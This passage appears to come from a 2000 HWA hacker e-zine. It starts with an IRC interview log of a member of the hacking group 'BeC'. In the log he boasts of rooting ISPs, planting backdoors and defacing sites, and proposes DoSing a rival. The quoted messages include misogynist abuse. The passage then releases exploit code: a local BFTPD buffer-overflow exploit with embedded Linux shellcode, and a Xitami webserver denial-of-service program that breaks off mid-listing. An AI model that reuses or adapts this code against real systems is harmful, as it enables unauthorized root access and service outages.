      [18:00] <[HWA]> [17:48] <[HWA]> never get into that?
      [18:00] <[HWA]> [17:49] <[HWA]> you can phreak and access the net using ham equipment, i've irc'd on packet radio with a hand held radio and tnc 
      [18:00] <[HWA]> [17:49] <[HWA]> hooked to a freebsd box
      [18:00] <Kr_D> hmmss
      [18:00] <[HWA]> ./.
      [18:01] <[HWA]> mitnick is a ham radio op thats why i ask
      [18:01] <[HWA]> he was hoping to get his license back after his release from jail i dont know if he was allowed it or not
      [18:01] <Kr_D> ok
      [18:01] <[HWA]> i wrote an article on it.
      [18:02] <[HWA]> we're pretty much nearly ready to wrap up here i think anyway
      [18:02] <[HWA]> unless you have much more to say
      [18:02] <Kr_D> nope
      [18:03] <[HWA]> I don't have much in the way of questions since BeC is relatively new
      [18:03] <Kr_D> no radio
      [18:03] <Kr_D> i would like to know thou
      [18:03] <Kr_D> how to play w/ radios
      [18:03] <Kr_D> hmmss
      [18:03] <Kr_D> is he allowed to use hamradios ?
      [18:03] <Kr_D> ok
      [18:03] <Kr_D> i hope he will come online soon
      [18:03] <Kr_D> and join #hwa-security
      [18:03] <Kr_D> os i can ask him stuff
      [18:03] <Kr_D> about tsutomu
      [18:03] <Kr_D> so that i can defeat him
      [18:03] <Kr_D> 'MWAHAHAHAHAHHAHA
      [18:03] <[HWA]> not sure
      [18:03] <Kr_D> i dono
      [18:03] <Kr_D> ask me stuff and i'll answer
      [18:03] <Kr_D> heh
      [18:03] <Kr_D> june 2000
      [18:03] <Kr_D> not sure?
      [18:03] <[HWA]> dunno what to ask, i'm questionless :(
      [18:04] <Kr_D> ask me if i have a glass of water
      [18:04] <[HWA]> what about June 2000
      [18:04] <Kr_D> bec was created then
      [18:04] <[HWA]> ah
      [18:04] <[HWA]> so backtracking , what has BeC done since its inception?
      [18:05] <[HWA]> and how many members? or is it a front group for one man?
      [18:05] <Kr_D> ok, so where done then
      [18:05] <Kr_D> let's talk about mafiaboy
      [18:05] <[HWA]> pretty much
      [18:05] <Kr_D> we are 3
      [18:05] <Kr_D> i "think"
      [18:05] <[HWA]> why 'think'?
      [18:05] <Kr_D> and we have done notjing
      [18:05] <[HWA]> an undecided member?
      [18:05] <Kr_D> i havent heard or seen one of them for two months
      [18:05] <Kr_D> i think he is either dead or busted
      [18:05] <[HWA]> but you are serious on targetting Tsutomu's computers or is that just a pipe dream?
      [18:05] <Kr_D> "the CC# guy"
      [18:06] <[HWA]> busted
      [18:06] <Kr_D> it's a pipe dream
      [18:06] <[HWA]> hrm
      [18:06] <[HWA]> he from same area or another country?
      [18:06] <Kr_D> he's from the us
      [18:06] <[HWA]> what about the other member?
      [18:06] <[HWA]> can you say nicks?
      [18:06] <Kr_D> i don't want to talk about other ppl
      [18:06] <Kr_D> heh
      [18:06] <[HWA]> ok
      [18:06] <Kr_D> for understandable reasons
      [18:07] <Kr_D> ok, now
      [18:07] <Kr_D> Mafiaboy
      [18:07] <[HWA]> we're done then thanks for talking with us about BeC.
      [18:07] <[HWA]> mafiaboy, what about him
      [18:07] <Kr_D> yeah
      [18:07] <Kr_D> that is what i am asking
      [18:07] *** [HWA] is now known as nobracket
      [18:07] <Kr_D> what about him
      [18:08] <Kr_D> what has he done that is so cool
      [18:08] <nobracket> he was busted for distributed denial of service attacks on major commercial sites
      [18:08] <nobracket> the names of which escape me at the moment
      [18:08] <Kr_D> yuck
      [18:08] <nobracket> he had hacked root in order to run mstream on them
      [18:08] <Kr_D> he probably thinks that is cool
      [18:09] <nobracket> i believe 100 or so roots
      [18:09] <Kr_D> that is nothing
      [18:09] <nobracket> wasted (imho) on a ddos net
      [18:09] <Kr_D> he was probably just a script kiddie
      [18:09] <nobracket> he held down these sites for 15 hrs or so and bragged about it openly on irc
      [18:09] <Kr_D> i mean, finding 100
      [18:09] <Kr_D> boxes isnt that hard
      [18:09] <nobracket> this was logged and sent to vetesgirl and i also got a copy and published the logs
      [18:09] <Kr_D> i hold on to my sites for life
      [18:10] <Kr_D> girl?
      [18:10] <Kr_D> GIRL?
      [18:10] <nobracket> ever come across a honeypot?
      [18:10] <Kr_D> is she goodlooking?`
      [18:10] <nobracket> yes vetesgirl she wrote 'vetescan' among other things
      [18:10] <Kr_D> i want her
      [18:10] <Kr_D> heh
      [18:10] <nobracket> I don't know she could look like dianora for all I know
      [18:11] <nobracket> (ROFL)
      [18:11] <Kr_D> or she could look like,.. nice
      [18:11] <Kr_D> so, what did mafiaboy say to her,
      [18:11] <nobracket> > >[Dianora   ) I want it back
      [18:11] <nobracket> > >[VetesGirl ) ur a fucking liar
      [18:11] <nobracket> > >[VetesGirl ) don't accuss me of shit until u have the facts dear
      [18:11] <nobracket> > >[VetesGirl ) I don't take channels
      [18:11] <nobracket> > >[VetesGirl ) and had no fucking part in html
      [18:11] <nobracket> > >[Dianora   ) you are on #html which was taken
      [18:11] <nobracket> > >[VetesGirl ) I am there legit
      [18:11] <nobracket> > >[VetesGirl ) i was invited and op'd
      [18:11] <nobracket> > >[VetesGirl ) I had no part in a take
      [18:11] <Kr_D> and what channel
      [18:12] <Kr_D> heh
      [18:12] <Kr_D> dionara = mafiaboy i reckon
      [18:12] <nobracket> dianora is an irc oper she codes ircd
      [18:12] <Kr_D> ok
      [18:12] <nobracket> vetesgirl's site is http://www.self-evident.com/
      [18:13] <Kr_D> so, what did mafiaboy say then
      [18:13] <Kr_D> briefly
      [18:13] <nobracket> you never heard of dianora or vetesgirl?
      [18:13] <Kr_D> i'v heard about vetesgirl
      [18:13] <nobracket> http://www.self-evident.com/refnet_old_news.html
      [18:13] <Kr_D> but not dionara
      [18:14] <Kr_D> so
      [18:14] <Kr_D> did mafiaboy get jail
      [18:14] <Kr_D> or did he get the chair?
      [18:14] <Kr_D> as in "theee chair"
      [18:14] <nobracket> jail
      [18:14] <Kr_D> bha
      [18:15] <Kr_D> for how lonmg?
      [18:15] <nobracket> +---------------------------------------
      [18:15] <nobracket>     | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial)
      [18:15] <nobracket>      ircname  / ./slice 0 cnn.com 22 80
      [18:15] <nobracket>      server   / irc.mcs.net ([192.160.127.97] MCSNet Services -
      [18:15] <nobracket>     (312)803-MCS1)
      [18:15] <nobracket>     +--------------------------------------------------
      [18:15] <Kr_D> and how did they bust him
      [18:15] <Kr_D> many questions
      [18:15] <nobracket> http://www.self-evident.com/exploits/vetes
      [18:15] <nobracket> http://www.self-evident.com/exploits/vetes
      [18:15] <nobracket> check it 
      [18:15] <Kr_D> ok
      [18:15] <nobracket> those are the logs
      [18:16] <Kr_D> she busted him?
      [18:16] <Kr_D> evil girl
      [18:16] <Kr_D> i don't like whiteruss
      [18:16] <nobracket> http://users3.cgiforme.com/vadia/cfmboard.html
      [18:16] <Kr_D> or cyphex
      [18:16] <Kr_D> heh
      [18:16] <Kr_D> how could they trace him
      [18:16] <nobracket> i dont like a lot of people but play the devils advocate and mr noncomittal
      [18:17] <Kr_D> heh didn't clean up after dinner?
      [18:17] <Kr_D> you see
      [18:17] <nobracket> that and also it was rumoured someone narqed him out
      [18:17] <Kr_D> now he's "tounting" enslaved
      [18:17] <Kr_D> please kick him
      [18:17] <Kr_D> witch reason KrD
      [18:17] <Kr_D> it would make me really happy
      [18:17] <Kr_D> :)
      [18:18] <Kr_D> or D0S him
      [18:18] <Kr_D> and blaim mafiaboy
      [18:18] <nobracket> his message was posted by mafiaboy, posted on April 13, 2000 at 18:56:17 coming from No domain available
      [18:18] <nobracket> YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE ISNT
      [18:18] <nobracket> GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! 
      [18:18] <nobracket> he did packet her site and kept it down for some time
      [18:18] <Kr_D> heh
      [18:19] <Kr_D> i would never doo that
      [18:19] <nobracket> This message was posted by VetesGirl, posted on April 15, 2000 at 07:05:18 coming from gm.is
      [18:19] <nobracket> This message is a reply to BITCH IM BACK!! posted from mafiaboy posted at April 13, 2000 at 18:56:17 
      [18:19] <nobracket> > YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE
      [18:19] <nobracket> ISNT GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER!
      [18:19] <nobracket> #1 if it is you, you are proably pr
      [18:19] <nobracket> shit
      [18:19] <nobracket> 1 if it is you, you are proably pretending that u didn't get caught so you can get your ass out of trouble and you are proably now a ci (confidential informant)
      [18:19] <nobracket> #2 Nark?? After the fact maybe You were on efnet msging everyone you could about the attacks and even msg'd your enemies (not a real bright move) and were putting on DoS shows in #!TNT (takes brains), lets see FBI heard about you on the 9th and the news was
      [18:19] <nobracket> posted on my page on the 13th I didn't come in first DAMN!
      [18:19] <nobracket> #3 Facts are correct you were o
      [18:19] <nobracket> on dsuper i remember you back in those days and the logs are true.
      [18:19] <nobracket> #4 Threaten all you like hun i know how it is and can say been there done that. Why do you packet? does it make you feel like a man, you gain respect from other lil boys who are just like you? You get to be SOMEBODY on efnet for a day wooohoo how leet
      [18:19] <nobracket> I honestly feel sorry for you. 
      [18:19] <nobracket> -=-
      [18:20] <nobracket> http://abcnews.go.com/sections/tech/DailyNews/webattacks000418.html
      [18:20] <nobracket> no
      [18:21] <Kr_D> you might aswell invite #linux.se
      [18:21] <nobracket> I let almost ANYONE in on PROBATION
      [18:21] <nobracket> if they suck they get the boot
      [18:21] <Kr_D> he p33rs me
      [18:21] <nobracket> so far i see nothing from him
      [18:21] <nobracket> but thats my problem'
      [18:21] <Kr_D> heh
      [18:21] <Kr_D> well, he kicked himself
      [18:21] <Kr_D> so, i'm satisfied
      [18:21] <Kr_D> i doin't understand that someone
      [18:21] <Kr_D> can be so famous for dosing sites
      [18:22] <Kr_D> that is so lame
      [18:22] <nobracket> Mafiaboy and the 15-year-old claimed credit for attacking
      [18:22] <nobracket>                  not only CNN.com but also E*TRADE and several
      [18:22] <nobracket>                  smaller sites. Mafiaboy also shared technical information
      [18:22] <nobracket>                  that only someone involved in the attacks would know,
      [18:22] <nobracket>                  Lyle said. 
      [18:22] <Kr_D> i mean, if i would (and i can) relay ALL calls
      [18:22] <Kr_D> from sweded to you
      [18:22] <nobracket>    Mafiaboy was saying What should I hit next? What
      [18:22] <nobracket>                  should I hit next? and people on the channel were
      [18:22] <nobracket>                  suggesting sites, and Mafiaboy was saying, OK, CNN,
      [18:22] <Kr_D> would i get famous
      [18:22] <Kr_D> NO
      [18:22] <nobracket>     A subscriber called Mafiaboy previously held two
      [18:22] <nobracket>                  accounts with Delphi Supernet, a Montreal Internet
      [18:22] <nobracket>                  service provider that Toronto-based ISP Internet Direct
      [18:22] <nobracket>                  bought last year. 
      [18:22] <nobracket>                       The accounts were closed in March 1998 because
      [18:22] <nobracket>                  Mafiaboy violated subscriber policies, but Internet Direct
      [18:22] <nobracket>                  would not say what the violations entailed.
      [18:22] <nobracket> hahaha
      [18:22] <nobracket> i thought he was from Montreal
      [18:22] <nobracket> hrm
      [18:22] <Kr_D> heh
      [18:23] <nobracket> Investigators were able to trace the attacks to Mafiaboy
      [18:23] <nobracket>                  by examining the log files of a computer at a University of
      [18:23] <nobracket>                  California at Santa Barbara research lab, which was
      [18:23] <nobracket>                  among those used to attack the CNN.com site. 
      [18:23] <nobracket>      The Royal Canadian Mounted Police is expected to
      [18:23] <nobracket>                  announce the arrest in a press conference Wednesday at
      [18:23] <nobracket>                  10:30 a.m. ET. The Justice Department and the FBI,
      [18:23] <nobracket>                  which assisted in the investigation, also are expected to
      [18:23] <nobracket>                  make a statement afterward. 
      [18:23] <Kr_D> heh
      [18:23] <nobracket> i remeber that was watching the conference on CNN
      [18:23] <nobracket> it was boring
      [18:24] <Kr_D> if i would get busted for everthing i'v done
      [18:24] <Kr_D> i would be hunted like mitnick
      [18:24] <Kr_D> and more famous
      [18:24] <nobracket> we (hwa) also staged a massive phake media conference and opened up a chat channel called #mediaevent did you read about that?
      [18:24] <nobracket> mafiaboy or his "friend" showed up.
      [18:24] <Kr_D> nope
      [18:24] <Kr_D> heh
      [18:24] <nobracket> its in one of the zine issues
      [18:24] <nobracket> the logs
      [18:25] <nobracket> quite funny, wired was going to do a story on it but later declined
      [18:25] <Kr_D> can you dcc a .gz with the lates issue?
      [18:25] <nobracket> since it was of course a hoax
      [18:25] <Kr_D> i'm lacy
      [18:25] <Kr_D> hmms
      [18:25] <nobracket> i can dcc a zip
      [18:25] <Kr_D> i'v been thinking about this for 4 minutes
      [18:25] <Kr_D> and
      [18:25] <Kr_D> no, gz
      [18:25] <nobracket> but if u want gz no prob
      [18:25] <nobracket> sec
      [18:25] <Kr_D> chill even
      [18:25] <Kr_D> just "be there"
      [18:26] <Kr_D> and do absolutley nothing
      [18:26] <nobracket> you can be a underground rumour mill informer
      [18:26] <nobracket> :-)
      [18:26] <Kr_D> heh
      [18:26] <nobracket> sure
      [18:26] <Kr_D> i can start rumors ;)
      [18:26] <Kr_D> ok, well
      [18:26] <Kr_D> sure
      [18:26] <Kr_D> :)
      [18:26] <nobracket> where to direct to? pop is broken right now 
      [18:26] <nobracket> :(
      [18:26] <Kr_D> do i get op on #hwa-security?      
      [18:27] <Kr_D> those webbmails are quite good acctually
      [18:27] <nobracket> done
      [18:27] <Kr_D> ok
      [18:28] <Kr_D> i'm planning to setup a cpt account @sun.com
      [18:28] <Kr_D> krd@sun.com ,.. yumme
      [18:28] <nobracket> lol
      [18:28] <Kr_D> heh
      [18:28] <nobracket> set one up for me too
      [18:28] <nobracket> nophear@sun.com
      [18:28] <nobracket> ;)
      [18:28] <Kr_D> ^[@sun.com :)=
      [18:28] <nobracket> fwd to nophear@hwa-security.net
      [18:28] <Kr_D> (not bracket)
      [18:28] <nobracket> are you on there?
      [18:28] <Kr_D> and they wil trace you in five seconds
      [18:28] <nobracket> you owned sun?
      [18:29] <Kr_D> i was
      [18:29] <nobracket> haha
      [18:29] <Kr_D> www.sun.se
      [18:29] <nobracket> cool
      [18:29] <Kr_D> they sent me a copy of solaris
      [18:29] <Kr_D> for "my trouble"
      [18:29] <Kr_D> i liked it
      [18:29] <nobracket> i owned some NS and lost em, pissed me off the didnt remove the backdoors they shutdown the servers completely
      [18:29] <nobracket4> never came back up so must have changed ips
      [18:29] <nobracket> weird
      [18:29] <Kr_D> i used to own three ISP;s in sweden
      [18:29] <nobracket> .jp boxen
      [18:29] <Kr_D> *.?? telia.com and 
      [18:29] <nobracket> ever do any carding?
      [18:30] <Kr_D> swipnet.se
      [18:30] <Kr_D> no carding
      [18:30] <Kr_D> until algonet busted me 
      [18:30] <Kr_D> that was april 97
      [18:30] <Kr_D> :)
      [18:30] <Kr_D> i dialed into them
      [18:30] <Kr_D> ok
      [18:30] <nobracket> what happened in the bust?
      [18:30] <nobracket> how did they catch ya?
      [18:30] <Kr_D> they called me up
      [18:30] <Kr_D> i used my first account
      [18:30] <Kr_D> guest23
      [18:30] <Kr_D> thats how i got in
      [18:30] <nobracket> haha
      [18:31] <Kr_D> guest??/@???net
      [18:31] <nobracket> then rooted them?
      [18:31] <Kr_D> and i wanted to try my new backdoor
      [18:31] <Kr_D> so i called them up
      [18:31] <Kr_D> saw lpc: down
      [18:31] <Kr_D> and the minute later the phone rang
      [18:31] <nobracket> what scanner if any do you use? any other tools you use or recommend to wannabe hax0rs?
      [18:31] <Kr_D> and asked me "do you own a computer with a modem"
      [18:31] <nobracket> lol
      [18:31] <Kr_D> i like, died
      [18:31] <Kr_D> there are no wannabee hax0rs anymore
      [18:31] <nobracket> "my dad does"
      [18:31] <Kr_D> they are all windows users
      [18:31] <nobracket> think not?
      [18:32] <nobracket> i think there are some
      [18:32] <Kr_D> i started as a amiga user
      [18:32] <Kr_D> everybody novadays will grow up with GUI only
      [18:32] <Kr_D> and no eleet stuff
      [18:32] <Kr_D> i met this kidd thou on a system
      [18:32] <nobracket> i started on a trs80 but first own computer was a vic20 with 5k memory
      [18:32] <Kr_D> i saw he was a hacker right at once
      [18:32] <Kr_D> so i staled him
      [18:32] <Kr_D> stalked even
      [18:32] <nobracket> staled? stalked
      [18:32] <nobracket> ok
      [18:32] <nobracket> why
      [18:32] <Kr_D> and talked him and said i was the sysadmin
      [18:32] <Kr_D> heh
      [18:33] <Kr_D> later i told the triouth
      [18:33] <nobracket> haha
      [18:33] <Kr_D> he was only 14
      [18:33] <Kr_D> abd still owned the net
      [18:33] <Kr_D> their
      [18:33] <Kr_D> he will become something for sure
      [18:33] <Kr_D> he wrote all his shit by hand
      [18:33] <Kr_D> with C
      [18:33] <nobracket> what do you mean, "he will become something for sure"
      [18:33] <Kr_D> a hacker
      [18:33] <Kr_D> a REAL hacker
      [18:34] <nobracket> ah so he was skilled and you respect him ok
      [18:34] <Kr_D> no
      [18:34] <nobracket> did he teach you anything?
      [18:34] <nobracket> not sure what you're meaning then
      [18:34] <Kr_D> but he was about as good as i was when i was 13
      [18:34] <Kr_D> still, he knew what he was doing
      [18:34] <nobracket> what about the scanners/tools?
      [18:35] <Kr_D> nmap
      [18:35] <Kr_D> and /usr/bin/rpcinfo
      [18:35] <Kr_D> /usr/sbin/rcpinfo even
      [18:35] <Kr_D> that is what i use
      [18:35] <nobracket> have you exploited dns cache poisoning?
      [18:35] <nobracket> jizz.c
      [18:35] <Kr_D> no
      [18:35] <nobracket> erect.c
      [18:35] <nobracket> etc
      [18:36] <nobracket> friend came up with  the concept he was first to do it
      [18:36] <Kr_D> i try not to use exploits
      [18:36] <Kr_D> i want to root the box by hand
      [18:36] <Kr_D> i have me evil trix to get root
      [18:36] <Kr_D> erm
      [18:36] <Kr_D> not here
      [18:36] <Cruciphux> brb
      [18:36] <nobracket> heh
      [18:36] <nobracket> sorry
      [18:39] <nobracket> who is zoa?
      [18:40] <nobracket> [18:38] *** Zoa_Chien (~Michelle@dial-15.kulak.ac.be) has joined #hwa-security
      [18:40] <nobracket> [18:39] <Kr_D> are they STALKING ME
      [18:40] <nobracket> [18:39] <Kr_D> Zoa_Chien, you will NEVER get me
      [18:40] <nobracket> [18:39] <Zoa_Chien> euhm.. Kr_D stoned again ?
      [18:41] <nobracket> [18:40] <Kr_D> but i was evil to kulac.ac.be
      [18:41] <nobracket> [18:40] <Kr_D> hmmss
      [18:41] <nobracket> [18:40] <Zoa_Chien> enjoy ku*.??.be
      [18:41] <nobracket> [18:40] <Zoa_Chien> and enjoy k*.??.be too
      [18:41] <nobracket> [18:40] <Kr_D> ok
      [18:41] <nobracket> Zoa_Chien is ~Michelle@dial-15.kulak.ac.be * sempronia
      [18:41] <nobracket> Zoa_Chien on #hwa-security 
      [18:41] <nobracket> Zoa_Chien using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
      [18:41] <nobracket> [18:40] <Kr_D> are you after me?
      [18:42] <nobracket> [18:40] <Kr_D> you know you can never capture me
      [18:42] <nobracket> [18:41] <Zoa_Chien> Krd.. i don't even want to look after you :-)
      [18:42] <nobracket> i'll include this too
      [18:42] <Kr_D> heh
      [18:42] <Kr_D> yeah
      [18:42] <Kr_D> heh
      [18:43] <Kr_D> shit
      [18:43] <Kr_D> everytime
      [18:43] <Kr_D> i use rixtele.com as ISP
      [18:43] <Kr_D> i feeel, like someone is watching me
      [18:43] <Kr_D> cause sometime
      [18:43] <Kr_D> the modem disconnects when i trie to haxor
      [18:43] <Kr_D> and i have allready got busted once for owning kevin.rixtele.com
      [18:43] <Kr_D> by rixtele.com
      [18:43] <nobracket> Kr_D is ~k0rrupt@213.x.x.x * Korrupt@sweden
      [18:43] <nobracket> Kr_D on @#chat-along.with-setvie #hwa-security @#INTERVIEW_BeC #hwa.hax0r.news #it99 
      [18:43] <nobracket> Kr_D using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
      [18:43] <Kr_D> it feels like some site has contacted rixtele.com
      [18:43] <nobracket> setvie
      [18:43] <nobracket> ;)
      [18:43] <Kr_D> and now they are sniffing my ass
      [18:44] <nobracket> lol
      [18:44] <Kr_D> no, i'm serious
      [18:44] <nobracket> sniffing your ass like the DOGS they are!
      [18:44] <Kr_D> i got a REALLY bad feeling
      [18:44] <Kr_D> about them
      [18:44] <nobracket> hrm
      [18:44] <nobracket> ditch em
      [18:44] <Kr_D> yeah
      [18:44] <Kr_D> i only use them sometime
      [18:44] <Kr_D> like _now_
      [18:44] <nobracket> hey you think a dvd player lef on pause overnight will burn the cd?
      [18:44] <Kr_D> heh
      [18:45] <Kr_D>  dono
      [18:46] <Kr_D> ?
      [18:46] * Cruciphux is back. hi. ..(2h19m50s)
      [18:47] <nobracket> [18:46] <Kr_D> Zoa_Chien 
      [18:47] <nobracket> 18:46] <Kr_D> Zoa_Chien 
      [18:47] <nobracket> [18:46] <Kr_D> whoohooo
      [18:47] <nobracket> [18:46] <Zoa_Chien> yes ?
      [18:47] <nobracket> [18:46] <Kr_D> are you stalking me
      [18:47] <nobracket> [18:47] <Zoa_Chien> yes :-)
      [18:47] <nobracket> brb
      [18:50] <nobracket> http://www.ntsource.com/~xxxxxx/efnet/
      [18:56] <nobracket> [18:54] <Kr_D> ok
      [18:56] <nobracket> [18:54] <Kr_D> so what are you wearing?
      [18:56] <nobracket> [18:54] <Zoa_Chien> nothin' much
      [18:56] <nobracket> [18:54] <Kr_D> mmmm
      [18:56] <nobracket> [18:55] <Zoa_Chien> want to see mi pic ?
      [18:56] <nobracket> [18:55] <Kr_D> i want to
      [18:56] <nobracket> [18:55] <Enslaved> i run windows on a sparc ultra10
      [18:56] <nobracket> [18:55] <Cruciphux> yeah me too
      [18:56] <nobracket> [18:55] <Kr_D> if you promise yyou are a redhet with firm tits
      [18:56] <nobracket> [18:55] <Zoa_Chien> its me and my sister
      [18:56] <nobracket> [18:55] <Kr_D> readhead even
      [18:56] <nobracket> [18:55] <Cruciphux> lol
      [18:56] <nobracket> [18:55] <Zoa_Chien> http://www.securax.org/xx/xxxo/
      [18:58] <nobracket> [18:56] <Kr_D> you look injured
      [18:58] <nobracket> [18:57] <Cruciphux> yeah we dont need that shit
      [18:58] <nobracket> [18:57] <Cruciphux> the door is over there ->
      [18:58] <nobracket> [18:57] <pip> dmamit
      [18:58] <nobracket> [18:57] <pip> hold up
      [18:58] <nobracket> [18:57] *** Cruciphux sets mode: -o+b Zoa_Chien *!*Michelle@*.ac.be
      [18:58] <nobracket> [18:57] *** Zoa_Chien was kicked by Cruciphux ((ar) sick puppy)
      [19:04] *** Cruciphux has quit IRC (Ping timeout: 360 seconds)
      [19:04] *** Disconnected
      
      See more from the BeC interviews and history in future issues.
      
      Session Time: Sun Oct 29 00:00:00 2000
      
      Cruci
      
      @HWA
      
       
328.0 [HWA] Releases: eth0 releases sscan2k-pre6 scanner
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
          
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      Check http://hwa-security.net for more also check 
      http://hwa-security.net/hot.html for new 
      releases.
      
      http://hwa-security.net/hot-new/sscan2k-pre6.HWA.tar.gz
      
      @HWA
      
329.0 [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html

      http://hwa-security.net/hot-new/HWA-w00p-local.c
      
      /* RELEASED BY Cruciphux HWA-SECURITY.NET     */
      /* w00p.c (HWA-w00p-local.c)                  */
      /* coded: Oct 25th                            */
      /* released Oct 29th                          */
      /* REMOTE exploit based on w00p.c forthcoming */
      
      #include <stdio.h>
      #include <string.h>
      #include <stdlib.h>
      
      #define ADDRS   54
      
              
              /* GREETZ TO JBUST, SKRIPT KIDDIES(I WUZ ONE), Enslaved, AND HWA-SECURITY*/
              /* VENGLIN, ETH0, CRUCIPHUX, ***non crippled version***. Have fun.
              /* Jbust is off of IRC h3h3 anyhow l4m3rz chroot() code */
      char linuxcode[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
                       "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
                       "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd"
                       "\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
                       "\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e"
                       "\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09"
                       "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88"
                       "\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89"
                       "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31"
                       "\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e"
                       "\x30\x73\x68\x31\x2e\x2e\x31\x31";
      
      int main(argc, argv)
      int argc;
      char **argv;
      {
              char buf[BUFSIZ], *p;
              long ret = 0xbffff960, *ap;
              int noplen;
              int align, i;
      
              if (argc != 3)
              {
                      fprintf(stderr, "Just_For_you: %s <align> <REMEMBER THE OFFSET> ie ./HWA-w00p test 1024\n", argv[0]);
                      exit(0);
              }
      
              align = atoi(argv[1]);
      
              memset(buf, 0x90, 49);
              buf[50] = '\0';
      
              strcat(buf, linuxcode);
      
              ret += atoi(argv[4]);
      
              for(i=0;i<align;i++) strcat(buf, "a");
      
              p = buf + strlen(buf);
              ap = (unsigned long *)p;
      
              for(i = 0; i < ADDRS / 4; i++)
                      *ap++ = ret;
      
              p = (char *)ap;
              *p = '\0';
      
              mkdir(buf, 0666);
      }

      
      @HWA
      
330.0 [HWA] Release: xitami.c DoS by forrest
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://hwa-security.net
      http://hwa-security.net/hot.html
      
      http://hwa-security.net/hot-new/HWA.xitami.c      
      
      /*
         This is DoS against Xitami Webserver v. 2.2b.
         
         Created mostly by me, my name is forrest :>. (sorry becouse of my poor style)
         This is part of Readme.txt:
         "You want ROCK-SOLID industrial-strength STABILITY?
          Xitami will run for years without maintenance.  We use a special
          memory management library to detect and flush-out memory leaks." -- I don`t think so...
         The same version of Xitami Ftpserver is vulnurable to con/con bug, just type
         cd con/con and it will crash the server...
         Greets to my friends from anonyunity, hwa-security and Cyberx- You know who you are ;]
         Also thanks to xfer ( sam wiesz najlepiej za co :> ) and superluck (becouse of helping me:>) :>, and k.g :[      
         Poland, 2000.         forrest@hq.hack.pl
                               forrest@hwa-security.net
                               
        comments about this or any other code to contact@hwa-security.net
        
        - Cruciphux                         
        
        RELEASED BY Cruciphux 
                    http://hwa-security.net/  
                    OCT 27 2000
        
      */
      #include <fcntl.h>
      #include <sys/types.h> 
      #include <sys/socket.h> 
      #include <netinet/in.h> 
      #include <signal.h> 
      #include <stdio.h> 
      #include <string.h> 
      #include <netdb.h> 
      #include <ctype.h> 
      #include <arpa/nameser.h> 
      #include <sys/stat.h> 
      #include <strings.h> 
      #include <stdio.h> 
      #include <stdlib.h> 
      #include <unistd.h> 
      #include <sys/socket.h>
        void main(int argc, char *argv[])
       {
        int sock;
        struct in_addr addr;
        struct sockaddr_in sin;
        struct hostent *he;
        char *cgistr;  
        char buffer[1024];  
        int count=0;
        int numin;  
        char get[1024];
        char *buff[50];
        buff[1] = "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
        "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
